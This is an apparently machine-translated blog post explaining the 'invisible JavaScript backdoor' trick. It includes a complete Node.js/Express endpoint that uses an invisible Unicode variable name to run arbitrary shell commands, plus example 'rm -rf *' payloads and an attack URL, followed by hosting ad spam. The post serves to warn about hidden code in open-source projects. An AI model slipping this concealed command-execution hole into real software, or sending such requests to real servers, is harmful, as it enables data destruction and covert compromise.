Last update at :2024-05-23,Edit by888u
Recently (in the past few years) friends in the group have discussed the security issues of scripts. Many people have said that my script is open source from gayhub and everyone can see the code. , if there was a backdoor, it would have been discovered long ago, and it must be safe.
Such remarks are obviously very naive. Firstly, not many people will actually look at the source code; secondly, there are ways to hide the backdoor in a very safe piece of code. Even if you look at the source code, It's also hard to see where the problem is with the code.
Today when we were learning (fishing) online, we accidentally discovered an article: The Invisible JavaScript Backdoor, address: css-tricks.com/the-invisible-javascript-backdoor, which was mentioned in it A very clever method that can be called an honest method of opening the back door.
The original node.js code is like this
const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);
const app = express();
app.get('/network_health', async (req, res) => {
const { timeout,ㅤ} = req.query;
const checkCommands = [
'ping -c 1 google.com',
'curl -s http://example.com/',ㅤ
];
Try {
await Promise.all(checkCommands.map(cmd =>
cmd && exec(cmd, { timeout: +timeout || 5_000 })));
res.status(200);
res.send('ok');
} catch(e) {
res.status(500);
res.send('failed');
}
});
app.listen(8080);This code uses the Express framework to build an API interface. When you call http://127.0.0.1:8080/network_health When , the background will first ping Google, and then use curl to access http://example.com. If everything succeeds, then obviously your network is normal, so ok will be returned to you. You can also set the parameter timeout=xxx to limit how long these two tests must be completed, otherwise it will be considered a network problem.
This function couldn’t be simpler. What could be the problem? Now I put the code in front of you and let you review it. Can you say there is something wrong with this code?
But in fact, the above code does have a backdoor that can execute arbitrary commands on the machine where this interface is deployed, including but not limited to downloading Trojans or rm -rf * .
The problem comes from the two circles below
After the commas in these two places, it looks like Like a space, I think it is a space, but it is not a space, but an invisible symbol: \u3164. We know that in JavaScript, almost any non-keyword Unicode symbol can be used as a variable name. And \u3164 is also a Unicode character and can obviously be used as a variable name.
Let’s take a look at the place where the command is executed in the above code:
const checkCommands = [
'ping -c 1 google.com',
'curl -s http://example.com/',ㅤ
];
Try {
await Promise.all(checkCommands.map(cmd =>
cmd && exec(cmd, { timeout: +timeout || 5_000 })));Here, Node.js will call the system Shell to execute the commands in the checkCommands array Two commands. If you write like this:
const hide_command = 'rm -rf *' const checkCommands = [ 'ping -c 1 google.com', 'curl -s http://example.com/',ㅤhide_command ];
Then you must know that three commands are executed, and the third command will delete the files in the computer. Now, replace the name hide_command with \u3164:
const ㅤ = 'rm -rf *' const checkCommands = [ 'ping -c 1 google.com', 'curl -s http://example.com/',ㅤ ];
Although you may find const ㅤ = 'rm -rf *' a bit strange, you should not doubt that there is something wrong with the following array. Because in your eyes, this array only has two commands, but it actually has three commands.
This attack code also hides the strange assignment statement const ㅤ = 'rm -rf *' into const { timeout,ㅤ} = req.query; . Because in Express, we can set URL parameters like this:
const {id, name, type} = req.query;Then, you can use these three parameters in the URL: http://127.0.0.1:8000/network_health?id=xxx&name=yyy&type=zzz. Now, this piece of code with a backdoor will actually receive two parameters, namely timeout and ㅤ. The latter one that looks like a space is \u3164, which is the variable name. Therefore, you can access the URL: http://127.0.0.1:8000/network_health?timeout=10&ㅤ=rm -rf *. Pass in the command to delete system files. Any Shell command can be passed here. If you don’t want to delete the other party’s system, you can download a Trojan horse program to the other party’s computer by executing Shell, and then you can remotely and secretly monitor what the other party is doing every day.
Such a backdoor is really hard to detect. There is no good way to avoid being cheated. For example, you see on Github that someone has open sourced an e-commerce system based on Node.js, so you use it and build your own online mall to sell small things. Maybe one day, you will find that your accounts are not correct, maybe because there is such a backdoor in the system.
I can only say that the best way is not to run code of unknown origin, and do not blindly think that the code is safe because it is an open source project.
Recommended site search: Wanwang domain name registration official website, servers in the United States, Singapore servers, Korean high-defense servers, American ASP space, website virtual host space, domain name registration Number inquiry, US host rental, Ministry of Industry and Information Technology registration inquiry, vps server rental,
发表评论